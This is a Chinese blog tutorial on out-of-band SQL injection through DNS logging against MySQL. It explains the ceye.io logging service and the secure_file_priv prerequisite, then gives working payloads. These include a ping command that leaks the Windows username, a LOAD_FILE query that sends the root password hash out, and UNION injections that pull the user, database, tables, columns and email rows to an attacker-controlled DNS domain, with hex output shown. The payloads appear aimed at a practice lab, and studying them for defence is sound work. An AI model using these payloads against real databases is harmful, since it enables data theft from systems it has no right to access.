当前位置:网站首页>DNSlog外带数据注入
DNSlog外带数据注入
2022-08-05 06:06:00 【树迷了路】
DNSlog
DNS log即DNS日志,域名解析的记录
外带原理
测试平台利用泛解析机制解析域名,并在解析我们构造的子域名时记录,生成日志,只要有解析就数据,我们查看日志即可获取关键数据
MySQL条件
配置文件 mysql.ini 中 secure_file_priv 参数需为空
mysql> show variables like '%secu%';
+------------------+-------+
| Variable_name | Value |
+------------------+-------+
| secure_auth | OFF |
| secure_file_priv | |
+------------------+-------+
2 rows in set (0.00 sec)
CEYE
测试网站
windows
ping %USERNAME%.b182oj.ceye.io
b1820j 换成网站分配的
SQL Injection
MySQL
SELECT LOAD_FILE(CONCAT('\\\\',(SELECT password FROM mysql.user WHERE user='root' LIMIT 1),'.mysql.ip.port.b182oj.ceye.io\\abc'));
load_file 是MySQL读文件的 函数 ;
\\\\——>\\
编码绕过
有些特殊字符在网站中是不合规代码,如user() 中的 @ ;
转十六进制即可;
如下实际为构造域名:\\user().aueuhs.ceye.io\\abc
?id=-1' union select 1,load_file(concat('\\\\',hex(user()),'.aueuhs.ceye.io\\abc')),3--+
726F6F74406C6F63616C686F7374 |
查数据库
?id=-1' union select 1,load_file(concat('\\\\',database(),'.aueuhs.ceye.io\\abc')),3--+
CEYE以将数据带入;
查表
?id=-1' union select 1,load_file(concat('\\\\',hex((select group_concat(table_name) from information_schema.tables where table_schema="security")),'.aueuhs.ceye.io\\abc')),3--+
656D61696C732C72656665726572732C756167656E74732C7573657273 |
查字段名
?id=-1' union select 1,load_file(concat('\\\\',hex((select group_concat(column_name) from information_schema.columns where table_schema="security" and table_name="emails")),'.aueuhs.ceye.io\\abc')),3--+
69642C656D61696C5F6964 |
查数据
?id=-1' union select 1,load_file(concat('\\\\',hex((select concat(id,0x3e,email_id) from security.emails limit 0,1)),'.aueuhs.ceye.io\\abc')),3--+
313E44756D62406468616B6B616E2E636F6D |
边栏推荐
猜你喜欢
随机推荐
深入分析若依数据权限@datascope (注解+AOP+动态sql拼接) 【循序渐进,附分析过程】
txt文件英语单词词频统计
LaTeX笔记
(2022杭电多校六)1012-Loop(单调栈+思维)
Pytorch分布式并行处理
LaTeX uses frame to make PPT pictures without labels
开源中国活动合作说明书
typescript66-分析partial的实现
【FAQ】What is Canon CCAPI
基于快速行进平方法的水面无人船路径规划
【考研结束第一天,过于空虚,想对自己进行总结一下】
怎么样避免线上内存泄漏
【FAQ】什么是 Canon CCAPI
D41_buffer pool
【8】Docker中部署Redis
LaTeX使用frame制作PPT图片没有标号
2022杭电多校六 1007-Shinobu loves trip(同余方程)
《PyTorch深度学习实践》第十课(卷积神经网络CNN)
Email management Filter emails
LaTeX 图片加标题 文本分栏自动换行